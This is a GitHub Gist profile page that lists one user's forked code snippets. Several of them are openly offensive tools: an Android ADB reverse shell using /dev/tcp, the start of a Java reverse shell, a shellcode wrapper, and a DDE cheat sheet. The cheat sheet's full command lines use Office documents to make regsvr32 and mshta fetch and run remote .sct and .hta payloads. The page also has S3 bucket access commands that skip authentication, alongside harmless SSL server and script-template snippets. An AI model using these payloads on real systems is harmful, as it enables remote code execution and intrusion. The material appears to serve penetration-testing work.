Skip to content

Instantly share code, notes, and snippets.

View CalfCrusher's full-sized avatar
Pwning

Christopher CalfCrusher

Pwning
127 followers · 76 following
View GitHub Profile
@CalfCrusher
CalfCrusher / pycat.py
Created September 24, 2021 09:54 — forked from Ludisposed/pycat.py
#!/usr/bin/env python3
import argparse
import datetime
from functools import wraps
import socket
from ssl import wrap_socket, create_default_context, CERT_NONE
import sys
import subprocess
import tempfile
@CalfCrusher
CalfCrusher / shellcode.c
Created April 3, 2022 20:04 — forked from darkerego/shellcode.c
wrapper for msf shellcode
/*
Deamonized ShellCode Wrapper
To compile:
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
@CalfCrusher
CalfCrusher / python-script-template.py
Created April 4, 2022 16:28 — forked from dkarchmer/python-script-template.py
Python Script Template with logging and arguments
import sys
import os
import argparse
import getpass
import logging
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger('upload_bom')
if __name__ == '__main__':
@CalfCrusher
CalfCrusher / SimpleSecureHTTPServer.py
Created April 20, 2022 16:02 — forked from sakti/SimpleSecureHTTPServer.py
simple secure http server using python
'''
SimpleSecureHTTPServer.py - simple HTTP server supporting SSL.
- replace fpem with the location of your .pem server file.
- the default port is 443.
usage: python SimpleSecureHTTPServer.py
Credit: https://code.activestate.com/recipes/442473-simple-http-server-supporting-ssl-secure-communica/
License: PSF License
@CalfCrusher
CalfCrusher / android-shell.sh
Created July 4, 2022 19:02
Android Reverse Shell
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
@CalfCrusher
CalfCrusher / C.java
Created July 10, 2022 10:08 — forked from caseydunham/C.java
Java Reverse Shell
// Not sure where I originally got this from.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class C {
public C() throws Exception {
String host="10.0.0.90";
@CalfCrusher
CalfCrusher / Macro-Less-Cheatsheet.md
Created August 8, 2022 18:30 — forked from mgeeky/Macro-Less-Cheatsheet.md
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

  • Using regsvr32 *.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using HTA files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
@CalfCrusher
CalfCrusher / btcbal.py
Created September 25, 2022 09:03 — forked from lukem512/btcbal.py
Retrieve Bitcoin address balance from Blockchain API
#!/usr/bin/python
import sys
import getopt
import urllib2
from optparse import OptionParser
def main():
# variables
btcaddr = ""
@CalfCrusher
CalfCrusher / aws-s3-buckets-pentest.txt
Created September 28, 2022 09:16 — forked from Anon-Exploiter/aws-s3-buckets-pentest.txt
Useful commands while testing s3 buckets!
aws s3 ls s3://s3buckethere --no-sign-request ## Lists the file in the s3 bucket
aws s3 cp s3://bucketname/filethere.txt . --no-sign-request ## Downloads `filethere.txt` from the s3 bucket in the current directory
aws s3 cp test.txt s3://bucketname --no-sign-request ## Uploads `test.txt` from current directory to the s3 bucket
aws s3api get-bucket-acl --bucket bucketname --no-sign-request ## Shows ACL (Access Control List) of the given bucket
aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request ## Shows ACL (Access Control List) of given object in the bucket
@CalfCrusher
CalfCrusher / readme.txt
Created October 19, 2022 21:32 — forked from nathanqthai/readme.txt
simple tornado server with ssl
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt
run server:
chmod +x server.py
./server.py
test server:
openssl s_client -connect localhost:8888